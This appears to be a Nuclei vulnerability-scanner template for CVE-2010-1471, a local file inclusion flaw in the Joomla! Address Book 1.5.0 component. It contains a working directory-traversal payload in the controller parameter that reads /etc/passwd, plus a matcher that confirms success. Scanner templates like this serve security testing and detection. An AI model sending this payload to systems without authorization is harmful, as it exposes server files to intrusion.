id: CVE-2010-1471 info: name: Joomla! Component Address Book 1.5.0 - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12170 - https://www.cvedetails.com/cve/CVE-2010-1471 - http://www.vupen.com/english/advisories/2010/0862 classification: cve-id: CVE-2010-1471 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # Enhanced by mp on 2022/02/14